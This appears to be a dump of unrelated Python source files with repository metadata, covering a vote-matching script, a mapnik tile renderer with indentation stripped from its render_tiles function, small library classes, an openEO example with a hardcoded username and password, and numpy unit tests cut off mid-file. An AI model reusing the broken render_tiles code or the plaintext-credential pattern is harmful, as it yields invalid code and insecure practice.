for date in date_to_votes:
    orders = stockstream.api.get_orders_by_date(date)
    # Collapse cancelled/filled pairs: when a cancelled order is immediately
    # followed by a filled order for the same side+symbol, treat them as one
    # order carrying the earlier (cancelled) timestamp.
    fixed_orders = []
    i = 0
    while i < len(orders) - 1:
        this_order = orders[i]
        next_order = orders[i + 1]
        same_side = next_order['side'].lower() == this_order['side'].lower()
        same_symbol = next_order['symbol'].lower() == this_order['symbol'].lower()
        if this_order['state'] == 'cancelled' and next_order['state'] == 'filled' and same_side and same_symbol:
            next_order['timestamp'] = this_order['timestamp']
            i += 2
            fixed_orders.append(next_order)
        else:
            fixed_orders.append(this_order)
            i += 1
    # Keep only orders that actually filled.
    fixed_orders = [order for order in fixed_orders if order['state'] == 'filled']
    total_orders += len(fixed_orders)
    for order in fixed_orders:
        order_id_to_order[order['id']] = order
    votes = date_to_votes[date]
    print "{} - {} votes {} orders".format(date, len(votes), len(fixed_orders))
    objects = [] + fixed_orders + votes
    sorted_objects = sorted(objects, key=lambda k: k['timestamp'])
    date_to_objects[date] = sorted_objects

# Walk each day's timeline; votes accumulate per player, and each order
# (recognised by having an 'id' key) claims the matching prior votes.
orphan_orders = 0
matched_orders = 0
order_to_votes = {}
for date in date_to_votes:
    player_to_vote = {}
    print "{} orphan orders.".format(orphan_orders)
    objects = date_to_objects[date]
    for obj in objects:
        if 'id' in obj:
            resp_votes = []
            for player in player_to_vote:
                votes = player_to_vote[player]
                for vote in votes:
                    # A vote matches if it names the same side+symbol and was
                    # cast in the 10 minutes (600000 ms) before the order.
                    if vote['action'].lower() == obj['side'].lower() and vote['parameter'].lower() == obj['symbol'].lower():
                        diff = obj['timestamp'] - vote['timestamp']
                        if diff > 0 and diff < 600000:
                            resp_votes.append(vote)
            if len(resp_votes) <= 0:
                orphan_orders += 1
                #print "For order {} have {} voters:\n{}.".format(obj, len(resp_votes), resp_votes)
            else:
                matched_orders += 1
                order_to_votes[obj['id']] = resp_votes
        else:
            if obj['username'] not in player_to_vote:
                player_to_vote[obj['username']] = []
            player_to_vote[obj['username']].append(obj)

# (disabled debug block kept as-is)
"""for id in order_to_votes:
    order = order_id_to_order[id]
    votes = order_to_votes[id]
    for vote in votes:
        diff = abs(order['timestamp'] - vote['timestamp'])
        print diff"""

print "{} total orders.".format(total_orders)
print "{} orphan orders.".format(orphan_orders)
print "{} matched orders.".format(matched_orders)
print "{} success rate".format(matched_orders/float(total_orders))
c2e31be5d18f3fe2b7f52f4dcf1298049713e2b3 | 7,008 | py | Python | server/localfinance/mapnik_render.py | regardscitoyens/nosfinanceslocales | b7b1a8c464153ea7a1cc4864aac0b3e67dc0be7e | [
"MIT"
] | 1 | 2015-03-18T08:07:08.000Z | 2015-03-18T08:07:08.000Z | server/localfinance/mapnik_render.py | regardscitoyens/nosfinanceslocales | b7b1a8c464153ea7a1cc4864aac0b3e67dc0be7e | [
"MIT"
] | 3 | 2017-01-05T20:00:59.000Z | 2017-04-14T19:31:38.000Z | server/localfinance/mapnik_render.py | regardscitoyens/nosfinanceslocales | b7b1a8c464153ea7a1cc4864aac0b3e67dc0be7e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from math import pi,sin,log,exp,atan
import os
from Queue import Queue
import threading
import json
import mapnik
DEG_TO_RAD = pi/180
RAD_TO_DEG = 180/pi
# Default number of rendering threads to spawn, should be roughly equal to number of CPU cores available
NUM_THREADS = 4
def minmax(a, b, c):
    """Clamp *a* into the closed interval [b, c] (assumes b <= c)."""
    return min(max(a, b), c)
class GoogleProjection:
    """Spherical-mercator <-> absolute-pixel converter for Google-style tiles."""

    def __init__(self, levels=18):
        # Per-zoom constants, indexed by zoom level:
        #   Bc - pixels per degree of longitude
        #   Cc - pixels per radian (mercator y scale)
        #   zc - pixel coordinates of the map centre
        #   Ac - total map width/height in pixels
        self.Bc = []
        self.Cc = []
        self.zc = []
        self.Ac = []
        size = 256
        for _ in range(levels):
            half = size / 2
            self.Bc.append(size / 360.0)
            self.Cc.append(size / (2 * pi))
            self.zc.append((half, half))
            self.Ac.append(size)
            size *= 2  # map doubles in size at every zoom level

    def fromLLtoPixel(self, ll, zoom):
        """Project (lon, lat) degrees to absolute pixel coordinates at *zoom*."""
        centre = self.zc[zoom]
        px = round(centre[0] + ll[0] * self.Bc[zoom])
        # Clamp latitude away from the poles where the mercator y diverges.
        lat_sin = minmax(sin(DEG_TO_RAD * ll[1]), -0.9999, 0.9999)
        py = round(centre[1] + 0.5 * log((1 + lat_sin) / (1 - lat_sin)) * -self.Cc[zoom])
        return (px, py)

    def fromPixelToLL(self, px, zoom):
        """Inverse of fromLLtoPixel: absolute pixel coordinates back to (lon, lat)."""
        centre = self.zc[zoom]
        lon = (px[0] - centre[0]) / self.Bc[zoom]
        merc_y = (px[1] - centre[1]) / -self.Cc[zoom]
        lat = RAD_TO_DEG * (2 * atan(exp(merc_y)) - 0.5 * pi)
        return (lon, lat)
class RenderThread:
    """Worker that pulls (x, y, z) tile jobs off a shared queue and renders a
    256x256 PNG tile plus a UTFGrid ``.grid.json`` file for each with mapnik.

    NOTE: this file is Python 2 (print statements in loop(), and
    ``json.dump(..., encoding=...)`` only exists on Python 2).
    """
    def __init__(self, tile_dir, xmlmap, q, printLock, maxZoom, fields=None, layer_id=None):
        self.tile_dir = tile_dir
        self.q = q
        self.render_size = 256  # tile edge length in pixels
        self.m = mapnik.Map(self.render_size, self.render_size)
        self.g = mapnik.Grid(self.render_size, self.render_size)
        self.printLock = printLock  # serializes console output across threads
        # Load style XML
        mapnik.load_map_from_string(self.m, xmlmap)
        # Obtain <Map> projection
        self.prj = mapnik.Projection(self.m.srs)
        # Projects between tile pixel co-ordinates and LatLong (EPSG:4326)
        self.tileproj = GoogleProjection(maxZoom+1)
        self.layer_id = layer_id          # layer index used for UTFGrid rendering
        self.fields = fields or []        # attribute fields included in the grid

    def get_bbox(self, x, y, z):
        """Return the mercator bounding box of tile (x, y) at zoom z."""
        # Calculate pixel positions of bottom-left & top-right
        p0 = (x * self.render_size, (y + 1) * self.render_size)
        p1 = ((x + 1) * self.render_size, y * self.render_size)

        # Convert to LatLong (EPSG:4326)
        l0 = self.tileproj.fromPixelToLL(p0, z);
        l1 = self.tileproj.fromPixelToLL(p1, z);

        # Convert to map projection (e.g. mercator co-ords EPSG:900913)
        c0 = self.prj.forward(mapnik.Coord(l0[0],l0[1]))
        c1 = self.prj.forward(mapnik.Coord(l1[0],l1[1]))

        # Bounding box for the tile
        if hasattr(mapnik,'mapnik_version') and mapnik.mapnik_version() >= 800:
            return mapnik.Box2d(c0.x,c0.y, c1.x,c1.y)
        else:
            # older mapnik releases used Envelope instead of Box2d
            return mapnik.Envelope(c0.x,c0.y, c1.x,c1.y)

    def render_tile(self, tile_uri, x, y, z):
        """Render tile (x, y, z) to a paletted PNG at *tile_uri*."""
        bbox = self.get_bbox(x, y, z)
        self.m.resize(self.render_size, self.render_size)
        self.m.zoom_to_box(bbox)
        self.m.buffer_size = 128  # render margin to avoid clipped labels/strokes

        # Render image with default Agg renderer
        im = mapnik.Image(self.render_size, self.render_size)
        mapnik.render(self.m, im)
        im.save(tile_uri, 'png256')

    def render_grid(self, grid_uri, x, y, z):
        """Render the UTFGrid for tile (x, y, z) to JSON at *grid_uri*."""
        bbox = self.get_bbox(x, y, z)
        self.m.resize(self.render_size, self.render_size)
        self.m.zoom_to_box(bbox)
        self.m.buffer_size = 128

        # Render grid
        utf_grids = mapnik.render_grid(self.m, self.layer_id, fields=self.fields)
        # An all-empty grid is stored as an empty string rather than the full
        # grid structure.
        if not utf_grids['keys'] or utf_grids['keys'] == [""]:
            utf_grids = ''
        json.dump(utf_grids, open(grid_uri, 'w'), encoding='utf-8')

    def loop(self):
        """Consume jobs from the queue until a None sentinel is received."""
        while True:
            #Fetch a tile from the queue and render it
            r = self.q.get()
            if (r == None):
                # None is the shutdown sentinel
                self.q.task_done()
                break
            else:
                (name, tile_uri, x, y, z) = r

            exists= ""
            if os.path.isfile(tile_uri):
                exists= "exists"  # skip re-rendering tiles already on disk
            else:
                self.render_tile(tile_uri, x, y, z)
            # NOTE: `bytes` shadows the builtin; index 6 of os.stat() is st_size.
            bytes=os.stat(tile_uri)[6]
            empty= ''
            # NOTE(review): 103 is presumably the byte size of a fully blank
            # png256 tile produced above — confirm before relying on it.
            if bytes == 103:
                empty = " Empty Tile "
            grid_uri = tile_uri.replace('.png', '.grid.json')
            if not os.path.isfile(grid_uri):
                print "grid", name, ":", z, x, y, exists, empty
                self.render_grid(grid_uri, x, y, z)
            self.printLock.acquire()
            print name, ":", z, x, y, exists, empty
            self.printLock.release()
            self.q.task_done()
def render_tiles(bbox, xmlmap, tile_dir, minZoom=1,maxZoom=18, name="unknown", num_threads=NUM_THREADS, tms_scheme=False, fields=None, layer_id=0):
# Render every tile intersecting *bbox* for zoom levels minZoom..maxZoom.
# bbox is (west, south, east, north) in lon/lat; xmlmap is a mapnik style XML
# string; tiles are written to tile_dir/<z>/<x>/<y>.png by num_threads workers
# fed through a bounded queue. tms_scheme flips y per the OSGeo TMS layout.
# NOTE(review): directory paths are built by plain concatenation, so tile_dir
# is assumed to end with a path separator -- confirm with callers.
print "render_tiles(",bbox, tile_dir, minZoom,maxZoom, name,")"
# Launch rendering threads
# Queue is bounded (32) so tile enumeration cannot run far ahead of rendering.
queue = Queue(32)
printLock = threading.Lock()
renderers = {}
for i in range(num_threads):
renderer = RenderThread(tile_dir, xmlmap, queue, printLock, maxZoom, fields=fields, layer_id=layer_id)
render_thread = threading.Thread(target=renderer.loop)
render_thread.start()
#print "Started render thread %s" % render_thread.getName()
renderers[i] = render_thread
if not os.path.isdir(tile_dir):
os.mkdir(tile_dir)
gprj = GoogleProjection(maxZoom+1)
# Pixel-space corners: ll0 is top-left (west, north), ll1 is bottom-right (east, south).
ll0 = (bbox[0],bbox[3])
ll1 = (bbox[2],bbox[1])
for z in range(minZoom,maxZoom + 1):
px0 = gprj.fromLLtoPixel(ll0,z)
px1 = gprj.fromLLtoPixel(ll1,z)
# check if we have directories in place
zoom = "%s" % z
if not os.path.isdir(tile_dir + zoom):
os.mkdir(tile_dir + zoom)
# Convert the pixel range to tile indices (256px per tile) and iterate columns.
for x in range(int(px0[0]/256.0),int(px1[0]/256.0)+1):
# Validate x co-ordinate
if (x < 0) or (x >= 2**z):
continue
# check if we have directories in place
str_x = "%s" % x
if not os.path.isdir(tile_dir + zoom + '/' + str_x):
os.mkdir(tile_dir + zoom + '/' + str_x)
for y in range(int(px0[1]/256.0),int(px1[1]/256.0)+1):
# Validate y co-ordinate
if (y < 0) or (y >= 2**z):
continue
# flip y to match OSGEO TMS spec
if tms_scheme:
str_y = "%s" % ((2**z-1) - y)
else:
str_y = "%s" % y
tile_uri = tile_dir + zoom + '/' + str_x + '/' + str_y + '.png'
# Submit tile to be rendered into the queue
t = (name, tile_uri, x, y, z)
try:
queue.put(t)
except KeyboardInterrupt:
raise SystemExit("Ctrl-c detected, exiting...")
# Signal render threads to exit by sending empty request to queue
for i in range(num_threads):
queue.put(None)
# wait for pending rendering jobs to complete
queue.join()
for i in range(num_threads):
renderers[i].join()
| 33.855072 | 147 | 0.550228 | 998 | 7,008 | 3.751503 | 0.249499 | 0.045406 | 0.05609 | 0.043269 | 0.210737 | 0.174145 | 0.142361 | 0.090812 | 0.05609 | 0.05609 | 0 | 0.032942 | 0.31992 | 7,008 | 206 | 148 | 34.019417 | 0.752623 | 0.125143 | 0 | 0.126667 | 0 | 0 | 0.02227 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.04 | null | null | 0.06 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2f00eca0637e25f52bd3d22e1622175e9673c10 | 509 | py | Python | numpyro/callbacks/history.py | ahmadsalim/numpyro | 015c80ddd24cf6bc89006fc3a70b424fecd09331 | [
"Apache-2.0"
] | 3 | 2020-08-25T14:31:08.000Z | 2020-08-26T02:23:08.000Z | numpyro/callbacks/history.py | ahmadsalim/numpyro | 015c80ddd24cf6bc89006fc3a70b424fecd09331 | [
"Apache-2.0"
] | null | null | null | numpyro/callbacks/history.py | ahmadsalim/numpyro | 015c80ddd24cf6bc89006fc3a70b424fecd09331 | [
"Apache-2.0"
] | 1 | 2020-09-11T10:08:27.000Z | 2020-09-11T10:08:27.000Z | from numpyro.callbacks import Callback
class History(Callback):
    """Callback that accumulates loss values reported during training and validation."""

    def __init__(self):
        super().__init__()
        # Recorded loss traces, appended to as the run progresses.
        self.training_history = []
        self.validation_history = []

    @staticmethod
    def _record(trace, info):
        # Append the 'loss' entry of an info dict to the given trace list.
        trace.append(info['loss'])

    def on_train_begin(self, train_info):
        self._record(self.training_history, train_info)

    def on_train_step_end(self, step, train_info):
        self._record(self.training_history, train_info)

    def on_validation_end(self, val_step, val_info):
        self._record(self.validation_history, val_info)
| 28.277778 | 56 | 0.693517 | 65 | 509 | 5.015385 | 0.338462 | 0.110429 | 0.174847 | 0.128834 | 0.319018 | 0.319018 | 0.319018 | 0.319018 | 0.319018 | 0.319018 | 0 | 0 | 0.192534 | 509 | 17 | 57 | 29.941176 | 0.793187 | 0 | 0 | 0.166667 | 0 | 0 | 0.023576 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.083333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2f1809a81b3849b9b283b1345c6723243f151b9 | 515 | py | Python | src/web/migrations/0003_movie_mean_rate.py | ncthanhcs/backend | 3ce8a92363d6ab0e067188c95a636f84b179fa53 | [
"Apache-2.0"
] | null | null | null | src/web/migrations/0003_movie_mean_rate.py | ncthanhcs/backend | 3ce8a92363d6ab0e067188c95a636f84b179fa53 | [
"Apache-2.0"
] | null | null | null | src/web/migrations/0003_movie_mean_rate.py | ncthanhcs/backend | 3ce8a92363d6ab0e067188c95a636f84b179fa53 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.0.12 on 2020-06-30 08:31
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
# Auto-generated migration: adds an integer 'mean_rate' column to the 'movie' model.
dependencies = [
# Must be applied after the previous 'web' app migration.
('web', '0002_auto_20200630_1111'),
]
operations = [
migrations.AddField(
model_name='movie',
name='mean_rate',
# Defaults to 1; validators constrain submitted values to the range 0..5.
field=models.IntegerField(default=1, validators=[django.core.validators.MaxValueValidator(5), django.core.validators.MinValueValidator(0)]),
),
]
| 25.75 | 152 | 0.658252 | 57 | 515 | 5.859649 | 0.719298 | 0.08982 | 0.179641 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0875 | 0.223301 | 515 | 19 | 153 | 27.105263 | 0.7475 | 0.08932 | 0 | 0 | 1 | 0 | 0.085653 | 0.049251 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6c068c98c8f2c840e783be0738abfe5de3859c92 | 742 | py | Python | network-client/src/gmu/chord/MessageCache.py | danfleck/Class-Chord | 00d53a43e524d5202afd72b9205f3dcf8169c775 | [
"Apache-2.0"
] | 1 | 2015-09-11T03:07:08.000Z | 2015-09-11T03:07:08.000Z | network-client/src/gmu/chord/MessageCache.py | danfleck/Class-Chord | 00d53a43e524d5202afd72b9205f3dcf8169c775 | [
"Apache-2.0"
] | null | null | null | network-client/src/gmu/chord/MessageCache.py | danfleck/Class-Chord | 00d53a43e524d5202afd72b9205f3dcf8169c775 | [
"Apache-2.0"
] | null | null | null | '''
Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information.
Created on Apr 9, 2014
@author: dfleck
'''
class MessageCache(list):
    '''
    Holds a list of tuples (envelope, message).

    Membership tests (``env in cache``) compare only the envelope's 'msgID'
    field, so any two envelopes sharing a msgID are treated as the same entry.
    '''

    def __contains__(self, otherEnvelope):
        '''Return True if any cached envelope has the same 'msgID' as otherEnvelope.'''
        # Hoist the key lookup out of the scan; removed the old commented-out
        # debug prints and replaced the manual loop with an any() scan.
        target_id = otherEnvelope['msgID']
        return any(envelope['msgID'] == target_id for envelope, _message in self)
6c14ea83d17a6d859ccb177813c51d84796b492b | 3,016 | py | Python | examples/gee_example.py | lforesta/openeo-python-client | d6cfc17f9693f6f6bf4a2ce60eac180ee9576543 | [
"Apache-2.0"
] | null | null | null | examples/gee_example.py | lforesta/openeo-python-client | d6cfc17f9693f6f6bf4a2ce60eac180ee9576543 | [
"Apache-2.0"
] | null | null | null | examples/gee_example.py | lforesta/openeo-python-client | d6cfc17f9693f6f6bf4a2ce60eac180ee9576543 | [
"Apache-2.0"
] | null | null | null | import openeo
import logging
import time
import json
from openeo.auth.auth_bearer import BearerAuth
logging.basicConfig(level=logging.INFO)
GEE_DRIVER_URL = "https://earthengine.openeo.org/v0.4"
OUTPUT_FILE = "/tmp/openeo_gee_output.png"
user = "group1"
password = "test123"
#connect with GEE backend
#session = openeo.session("nobody", GEE_DRIVER_URL)
#TODO update example
con = openeo.connect(GEE_DRIVER_URL, auth_type=BearerAuth, auth_options={"username": user, "password": password})
#Test Connection
print(con.list_processes())
print(con.list_collections())
print(con.describe_collection("COPERNICUS/S2"))
# Test Capabilities
cap = con.capabilities()
print(cap.version())
print(cap.list_features())
print(cap.currency())
print(cap.list_plans())
# Test Processes
datacube = con.imagecollection("COPERNICUS/S2")
datacube = datacube.filter_bbox(west=16.138916, south=48.138600, east=16.524124, north=48.320647, crs="EPSG:4326")
datacube = datacube.filter_daterange(extent=["2017-01-01T00:00:00Z", "2017-01-31T23:59:59Z"])
datacube = datacube.ndvi(nir="B4", red="B8A")
datacube = datacube.min_time()
print(json.dumps(datacube.graph, indent=2))
# Test Job
job = con.create_job(datacube.graph)
print(job.job_id)
print(job.start_job())
print (job.describe_job())
time.sleep(5)
job.download_results("/tmp/testfile")
# PoC JSON:
# {
# "process_graph":{
# "process_id":"stretch_colors",
# "args":{
# "imagery":{
# "process_id":"min_time",
# "args":{
# "imagery":{
# "process_id":"NDVI",
# "args":{
# "imagery":{
# "process_id":"filter_daterange",
# "args":{
# "imagery":{
# "process_id":"filter_bbox",
# "args":{
# "imagery":{
# "product_id":"COPERNICUS/S2"
# },
# "left":9.0,
# "right":9.1,
# "top":12.1,
# "bottom":12.0,
# "srs":"EPSG:4326"
# }
# },
# "from":"2017-01-01",
# "to":"2017-01-31"
# }
# },
# "red":"B4",
# "nir":"B8"
# }
# }
# }
# },
# "min": -1,
# "max": 1
# }
# },
# "output":{
# "format":"png"
# }
# }
| 29.568627 | 114 | 0.43435 | 262 | 3,016 | 4.862595 | 0.469466 | 0.035322 | 0.056515 | 0.062794 | 0.040816 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064385 | 0.428382 | 3,016 | 101 | 115 | 29.861386 | 0.674594 | 0.578581 | 0 | 0 | 0 | 0 | 0.150123 | 0.021329 | 0 | 0 | 0 | 0.009901 | 0 | 1 | 0 | false | 0.064516 | 0.16129 | 0 | 0.16129 | 0.354839 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6c1563fe85c2fd723de6d84ea7594c977af3340c | 28,165 | py | Python | src/PythonUnitTests/ArrayCreationTests.py | Quansight-Labs/numpy.net | cfa063a935a562e97deb9a20b2d0c41ab00d3a4b | [
"BSD-3-Clause"
] | 59 | 2019-01-20T19:43:05.000Z | 2022-03-26T06:08:51.000Z | src/PythonUnitTests/ArrayCreationTests.py | Quansight-Labs/numpy.net | cfa063a935a562e97deb9a20b2d0c41ab00d3a4b | [
"BSD-3-Clause"
] | 21 | 2019-06-06T17:45:01.000Z | 2022-03-30T10:37:24.000Z | src/PythonUnitTests/ArrayCreationTests.py | Quansight-Labs/numpy.net | cfa063a935a562e97deb9a20b2d0c41ab00d3a4b | [
"BSD-3-Clause"
] | 7 | 2019-05-12T21:06:18.000Z | 2022-02-13T12:23:23.000Z | import unittest
import numpy as np
import time as tm
import matplotlib.pyplot as plt
from nptest import nptest
import operator
class ArrayCreationTests(unittest.TestCase):
def test_PrintVersionString(self):
print(np.__version__)
def test_simpleShape_1(self):
a=np.array([1,2,3])
x=a.shape[0]
print(x)
def test_Slice3x2x2_1(self):
x = np.arange(12).reshape(3, 2, 2);
y = x[1:];
y *= 99;
print(x)
def test_asfarray_1(self):
a = np.asfarray([2, 3])
print(a)
b = np.asfarray([2, 3], dtype='float')
print(b)
c = np.asfarray([2, 3], dtype='int8')
print(c)
def test_asmatrix_1(self):
x = np.array([[1, 2], [3, 4]])
m = np.asmatrix(x)
x[0,0] = 5
print(m)
def test_copy_1(self):
x = np.array([1, 2, 3])
y = x
z = np.copy(x)
# Note that, when we modify x, y changes, but not z:
x[0] = 10
print(x[0] == y[0])
#True
print(x[0] == z[0])
#False
def test_linspace_1(self):
a = np.linspace(2.0, 3.0, num=5)
print(a)
b = np.linspace(2.0, 3.0, num=5, endpoint=False)
print(b)
c = np.linspace(2.0, 3.0, num=5, retstep=True)
print(c)
def test_linspace_2(self):
    """linspace over complex endpoints, plus endpoint=False and retstep variants."""
    # np.complex was an alias for the builtin and was removed in NumPy 1.24;
    # use the builtin complex so this test runs on current NumPy.
    a = np.linspace(2+1.3j, 3+5.6j, num=5, dtype=complex)
    print(a)
    b = np.linspace(2.0, 3.0, num=5, endpoint=False)
    print(b)
    c = np.linspace(2.0, 3.0, num=5, retstep=True)
    print(c)
def test_linspace_3(self):
a = np.linspace(2.0, 3.0, num=5, dtype= np.longlong)
print(a)
b = np.linspace(2.0, 3.0, num=5, endpoint=False, dtype= np.longlong)
print(b)
c = np.linspace(2.0, 3.0, num=5, retstep=True, dtype= np.longlong)
print(c)
def test_logspace_1(self):
a = np.logspace(2.0, 3.0, num=4)
print(a)
b = np.logspace(2.0, 3.0, num=4, endpoint=False)
print(b)
c = np.logspace(2.0, 3.0, num=4, base=2.0)
print(c)
def test_logspace_2(self):
a = np.logspace(2, 3, num=4, dtype=np.longlong)
print(a)
b = np.logspace(2.0, 3.0, num=4, endpoint=False, dtype=np.longlong)
print(b)
c = np.logspace(2.0, 3.0, num=4, base=2.0, dtype=np.longlong)
print(c)
def test_geomspace_1(self):
a = np.geomspace(1, 1000, num=4)
print(a)
b = np.geomspace(1, 1000, num=3, endpoint=False)
print(b)
c = np.geomspace(1, 1000, num=4, endpoint=False)
print(c)
d = np.geomspace(1, 256, num=9)
print(d)
def test_meshgrid_1(self):
nx = 3
ny = 2
x = np.linspace(0, 1, nx)
y = np.linspace(0, 1, ny)
xv = np.meshgrid(x)
print(xv)
print("************")
xv, yv = np.meshgrid(x, y)
print(xv)
print(yv)
print("************")
xv, yv = np.meshgrid(x, y, sparse=True)
print(xv)
print(yv)
print("************")
x = np.arange(-5, 5, 1)
y = np.arange(-5, 5, 1)
xx, yy = np.meshgrid(x, y, sparse=True)
print(xx)
print(yy)
print("************")
def test_meshgrid_1_longlong(self):
nx = 3
ny = 2
x = np.linspace(0, 100, nx, dtype=np.longlong)
y = np.linspace(0, 100, ny, dtype=np.longlong)
xv = np.meshgrid(x)
print(xv)
print("************")
xv, yv = np.meshgrid(x, y)
print(xv)
print(yv)
print("************")
xv, yv = np.meshgrid(x, y, sparse=True)
print(xv)
print(yv)
print("************")
x = np.arange(-5, 5, 1, dtype=np.longlong)
y = np.arange(-5, 5, 1, dtype=np.longlong)
xx, yy = np.meshgrid(x, y, sparse=True)
print(xx)
print(yy)
print("************")
def test_meshgrid_2(self):
nx = 3
ny = 2
nz = 2
x = np.linspace(0, 1, nx)
y = np.linspace(4, 5, ny)
z = np.linspace(8, 9, nz)
xv, yv, zv = nptest.meshgrid(x, y, z, indexing='ij')
print(xv)
print(yv)
print(zv)
print("************")
xv, yv, zv = np.meshgrid(x, y,z, sparse=True)
print(xv)
print(yv)
print(zv)
print("************")
x = np.arange(-2, 2, 1)
y = np.arange(-2, 2, 1)
z = np.arange(2, -2, -1)
xx, yy, zz = np.meshgrid(x, y, z, copy=True)
print(xx)
print(yy)
print(zz)
print("************")
def test_OneDimensionalArray(self):
l = [12.23, 13.32, 100, 36.32]
print("Original List:",l)
a = np.array(l)
print("One-dimensional numpy array: ",a)
print(a.shape)
print(a.strides)
def test_arange_2to11(self):
a = np.arange(2, 11, 1, dtype = np.int8)
print(a)
print(a.shape)
print(a.strides)
def test_arange_2to11_double(self):
a = np.arange(2.5, 11.5, 2)
print(a)
print(a.shape)
print(a.strides)
def test_arange_2to11_float(self):
a = np.arange(2.5, 37.7, 2.2, dtype=np.float32)
print(a)
print(a.shape)
print(a.strides)
def test_arange_reshape_33(self):
a = np.arange(2, 11).reshape(3,3)
print(a)
print(a.shape)
print(a.strides)
def test_arange_reshape_53(self):
a = np.arange(0, 15).reshape(5,3)
print(a)
print(a.shape)
print(a.strides)
def test_reverse_array(self):
x = np.arange(0,40)
print("Original array:")
print(x)
print("Reverse array:")
x = x[::-1]
print(x)
y = x + 100
print(y)
z = x.reshape(5,-1)
print(z)
def test_1_OnBorder_0Inside(self):
x = np.ones((15,15), dtype= np.double)
print("Original array:")
print(x)
print(x.shape)
print(x.strides)
print("1 on the border and 0 inside in the array")
x[1:-1,1:-1] = 0
print(x)
print(x.shape)
print(x.strides)
def test_1_OnBorder_0Inside_2(self):
x = np.arange(0,225, dtype= np.double).reshape(15,15)
print("Original array:")
print(x)
print(x.shape)
print(x.strides)
print("1 on the border and 0 inside in the array")
x = x[1:-1,1:-1];
print(x)
print(x.shape)
print(x.strides)
def test_checkerboard_1(self):
x = np.ones((3,3))
print("Checkerboard pattern:")
x = np.zeros((8,8),dtype=int)
x[1::2,::2] = 1
x[::2,1::2] = 1
print(x)
def test_F2C_1(self):
fvalues = [0, 12, 45.21, 34, 99.91]
F = np.array(fvalues, dtype=np.float32)
print("Values in Fahrenheit degrees:")
print(F)
print("Values in Centigrade degrees:")
C = 5*F/9 - 5*32/9;
print(C)
def test_RealImage_float_1(self):
x = np.array([1.0,1.5,1.74,1.9])
y = np.array([0.1,0.3,0.5,0.7])
print("Original array:x ",x)
print("Original array:y ",y)
print("Real part of the array:")
print(x.real)
print(y.real)
print("Imaginary part of the array:")
print(x.imag)
print(y.imag)
def test_ArrayStats_1(self):
x = np.array([1,2,3], dtype=np.float64)
print("Size of the array: ", x.size)
print("Length of one array element in bytes: ", x.itemsize)
print("Total bytes consumed by the elements of the array: ", x.nbytes)
def test_ndarray_flatten(self):
x = np.arange(0.73,25.73, dtype= np.double).reshape(5,5)
y = x.flatten()
print(x)
print(y)
y = x.flatten(order='F')
print(y)
y = x.flatten(order='K')
print(y)
def test_ndarray_flatten_longlong(self):
x = np.arange(7,32, dtype= np.longlong).reshape(5,5)
y = x.flatten()
print(x)
print(y)
y = x.flatten(order='F')
print(y)
y = x.flatten(order='K')
print(y)
def test_ndarray_byteswap(self):
x = np.arange(32,64, dtype= np.int16)
print(x)
y = x.byteswap(True)
print(y)
x = np.arange(32,64, dtype= np.int32)
print(x)
y = x.byteswap(True)
print(y)
x = np.arange(32,64, dtype= np.int64)
print(x)
y = x.byteswap(True)
print(y)
def test_ndarray_view(self):
x = np.arange(256+32,256+64, dtype= np.int16)
print(x)
print(x.shape)
print(x.dtype)
y = x.view(np.uint8)
print(y)
print(y.shape)
print(y.dtype)
print("modifying data")
y[1] = 99
print(x)
def test_ndarray_view_1(self):
x = np.arange(0,32, dtype= np.int16).reshape(2,-1,4)
print("X")
print(x)
print(x.shape)
y = x.T
print("Y")
print(y)
print(y.shape)
z = y.view()
z[0] = 99
print("Z")
print(z)
print(z.shape)
print("X")
print(x)
print("Y")
print(y)
def test_ndarray_view2(self):
x = np.arange(256+32,256+64, dtype= np.int16)
print(x)
print(x.shape)
print(x.dtype)
y = x.view(np.uint32)
print(y)
print(y.shape)
print(y.dtype)
print("modifying data")
y[1] = 99
y[5] = 88
print(y)
print(x)
def test_ndarray_view2_reshape(self):
x = np.arange(65470+32,65470+64, dtype= np.uint16).reshape(2,2,-1)
print(x)
print(x.shape)
print(x.dtype)
z = x[:,:,[2]]
print(z)
y = z.view().reshape(-1);
print(y)
print(y.shape)
print(y.dtype)
def test_ndarray_view3(self):
x = np.arange(256+32,256+64, dtype= np.int16)
print(x)
print(x.shape)
print(x.dtype)
y = x.view(np.uint64)
print(y)
print(y.shape)
print(y.dtype)
print("modifying data")
y[1] = 99
y[5] = 88
print(y)
print(x)
def test_ndarray_delete1(self):
x = np.arange(0,32, dtype= np.int16).reshape(8,4)
print("X")
print(x)
print(x.shape)
y = np.delete(x, 0, axis=1)
y[1] = 99
print("Y")
print(y)
print(y.shape)
print("X")
print(x)
def test_ndarray_delete2(self):
